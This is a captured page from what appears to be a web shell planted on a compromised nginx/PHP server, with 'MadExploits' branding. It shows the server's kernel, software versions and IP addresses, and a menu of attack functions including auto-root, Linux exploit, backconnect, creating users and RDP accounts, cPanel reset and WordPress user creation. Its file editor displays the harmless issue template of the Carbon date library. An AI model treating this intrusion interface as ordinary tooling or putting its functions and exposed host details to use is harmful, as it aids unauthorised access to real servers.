Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
vendor /
nesbot /
carbon /
.github /
[ HOME SHELL ]
Name
Size
Permission
Action
ISSUE_TEMPLATE.md
1.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ISSUE_TEMPLATE.md
Hello, I encountered an issue with the following code: ```php echo Carbon::parse('2018-06-01')->subDay()->month; ``` Carbon version: **PUT HERE YOUR COMPOSER CARBON VERSION** PHP version: **PUT HERE YOUR PHP VERSION** <!-- Run the command `composer show nesbot/carbon` to get "versions" Use `echo phpversion();` to get PHP version. Some issues can depends on your context, settings, macros, timezone, language. So to be sure the code you give is enough to reproduce your bug, try it first in: https://try-carbon.herokuapp.com/?theme=xcode&export&embed You can use the [Options] button to change the version then when you get the bug with this editor, you can use the [Export] button, copy the link of the opened tab, then paste it in the issue. Then we can immediatly get your issue. --> I expected to get: ``` 6 ``` <!-- Always give your expectations. Each use has their owns. You may want daylight saving time to be taken into account, someone else want it to be ignored. You may want timezone to be used in comparisons, someone else may not, etc. --> But I actually get: ``` 5 ``` <!-- If you did not succeed to get the same result in https://try-carbon.herokuapp.com/ then precise the result you get. --> Thanks!
Close